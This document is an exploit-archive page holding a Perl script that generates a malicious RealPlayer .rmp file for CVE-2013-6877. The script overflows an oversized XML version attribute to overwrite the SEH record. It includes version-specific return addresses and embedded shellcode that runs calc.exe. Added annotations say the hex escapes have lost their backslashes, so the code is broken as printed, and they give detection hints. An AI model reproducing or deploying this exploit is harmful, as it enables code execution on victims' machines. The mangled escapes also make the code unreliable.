
RealNetworks RealPlayer 16 Buffer Overflow

Posted on 26 December 2013

#!/usr/bin/perl
#-----------------------------------------------------------------------------#
# Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow     #
# Date: Dec 20, 2013                                                          #
# Exploit Author: Gabor Seljan                                                #
# Vendor Homepage: http://www.real.com                                        #
# Software Link: http://www.oldapps.com/real.php?old_real_player=12814        #
# Version: 16.0.3.51 and 16.0.2.32                                            #
# Tested on: Windows XP SP2/SP3 (NX)                                          #
# CVE: CVE-2013-6877                                                          #
#-----------------------------------------------------------------------------#
#
# Proof-of-concept generator for CVE-2013-6877. It writes a single .rmp file
# whose XML prolog carries an oversized "version" attribute; the attribute
# body is filler with an SEH-overwrite record (nSEH, SEH, payload) placed at
# two offsets, so the same file is meant to cover both ways RealPlayer can
# open it (see $junk1 / $junk2 below).
#
# NOTE(review): the hex escapes in every string literal below appear on this
# page as "x41" rather than "\x41" — the backslashes look to have been lost
# in page extraction. As literally written, the script emits the ASCII
# letters/digits, not the bytes the comments describe.
#
# Detection/mitigation pointers (defender view): an .rmp/XML prolog whose
# version attribute is tens of kilobytes long is a simple content signature;
# the script targets one exact build at a time because the SEH handler
# address is a fixed, version-specific constant (one active, one commented
# out).

use strict;
use warnings;

# Output file name; written to the current working directory.
my $filename = "sploit.rmp";

# Hex for `<?xml version="` and for `"?>;` — the prolog that wraps the
# oversized attribute value.
my $open  = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22";
my $close = "x22x3fx3ex3b";

# Two filler lengths: the distance to the SEH record differs by how the file
# is opened, so the record is emitted twice (see $sploit).
my $junk1 = "x41" x 2540;    # Offset to SEH when opening via click
my $junk2 = "x41" x 10514;   # Offset to SEH when opening via menu

# SEH record: a short forward jump in the nSEH slot and a handler address
# packed little-endian (pack 'V') as a 32-bit value.
my $nSEH  = "xebx06x90x90"; # Overwrite next SEH with JMP (6 bytes)
my $SEH   = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51)
#my $SEH  = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32)

# Trailing filler past the second record so the overflow actually faults.
my $junk3 = "x41" x 17000;   # Generate exception

# msfpayload windows/exec CMD=calc.exe
# (benign demonstration payload as labelled by the author; the bytes are
# reproduced exactly as shown on the page)
my $shellcode =
"xb8x2fx9exa9x6fxdbxdcxd9x74x24xf4x5ax2bxc9xb1".
"x33x83xeaxfcx31x42x0ex03x6dx90x4bx9ax8dx44x02x65x6dx95x75".
"xefx88xa4xa7x8bxd9x95x77xdfx8fx15xf3x8dx3bxadx71x1ax4cx06".
"x3fx7cx63x97xf1x40x2fx5bx93x3cx2dx88x73x7cxfexddx72xb9xe2".
"x2ex26x12x69x9cxd7x17x2fx1dxd9xf7x24x1dxa1x72xfaxeax1bx7c".
"x2ax42x17x36xd2xe8x7fxe7xe3x3dx9cxdbxaax4ax57xafx2dx9bxa9".
"x50x1cxe3x66x6fx91xeex77xb7x15x11x02xc3x66xacx15x10x15x6a".
"x93x85xbdxf9x03x6ex3cx2dxd5xe5x32x9ax91xa2x56x1dx75xd9x62".
"x96x78x0exe3xecx5ex8axa8xb7xffx8bx14x19xffxccxf0xc6xa5x87".
"x12x12xdfxc5x78xe5x6dx70xc5xe5x6dx7bx65x8ex5cxf0xeaxc9x60".
"xd3x4fx25x2bx7exf9xaexf2xeaxb8xb2x04xc1xfexcax86xe0x7ex29".
"x96x80x7bx75x10x78xf1xe6xf5x7exa6x07xdcx1cx29x94xbcxccxcc".
"x1cx26x11x7fx72x75x0axf5x98x79x2fxb1x76x30xe0x3fx49x74x0d".
"x93x42x0cxbfx92xb8x4exbax4axbex99x71x09xf8x14xa9x96x91x7e".
"x7cx77x27x25x7bx38xd6x9bx33xd5xb5x31xe1x66xb7xb4x80xd2xfd".
"x2dxb6x24x43x67x90xb2xbbx47x40x73x3cx3dx97x1cx29xd0xf9x70".
"x4bx78x35x9fx4fx2cxb3x7ax05x87xf6xd3xebx48xb0x89xf7xe2x41".
"x1dx8dxb9x15x04x2bxfcxa8x3axd4x37x7dx19xf8x7ex08xebx21xe1".
"x7bx71x75x05x3fxbbx66x0cx93x3cx8dx98x69xf9x7cx27x70x48x23".
"xd4x84xf5xbex72x4exa8x9bx73x25x41x81xe0x04x40x78x79x43x37".
"x7fx2cx96xb9xbfx74x77x1dx0dx20xfcxb4x91xa9xb8x97x4bx18xe3".
"x49x7dx76x3dx47xbaxb5x14x99xb1x24x83xe2x10xfdx67x7ax4fx35".
"x9fxb6xb3x7dx75x32xe2x4ax86xd5xb2xb7xb0x77x11xe0x12xd1xeb".
"x1cx90x7fx42x7cx2dx92x72x2fx7ax13xc0xd6x76x15x99x70x14x8d".
"x4exbex96xb7x85xffxc1xe1x2dxb0x71x1bxd5x1dx02xe3x04x7bx05".
"xb2x73x03xf8xb4x7ex1axfdxb9x37x42x4bxb3x39xf9x25xb5xa8x3d".
"xbax92x40x4axb6x24x79x27x0cxbbx88xfcx3cx35x97x4fx9bx47x78".
"x15x41x91x66xb1x74x0dxbfxb8x90x28xd4x2axf5x3fx43x93x98x2c".
"x1cxa9x2fx48x9fx67x49x3bxd6";

# One SEH record (nSEH, handler address, payload); it is inserted twice.
my $evil = $nSEH.$SEH.$shellcode;

# File layout: prolog, filler to the first record, record, filler to the
# second record, record, trailing filler, closing prolog.
my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close;

# Two-arg open with a bareword handle: the mode comes from the string, so
# this form is only safe because $filename is a fixed literal here; the
# idiomatic form is `open my $fh, '>', $filename or die ...`.
open(FILE, ">$filename") || die "[-]Error: $! ";
print FILE $sploit;
# close() is unchecked; a buffered write failure would go unreported.
close(FILE);
print "Exploit file created successfully [$filename]! ";

 

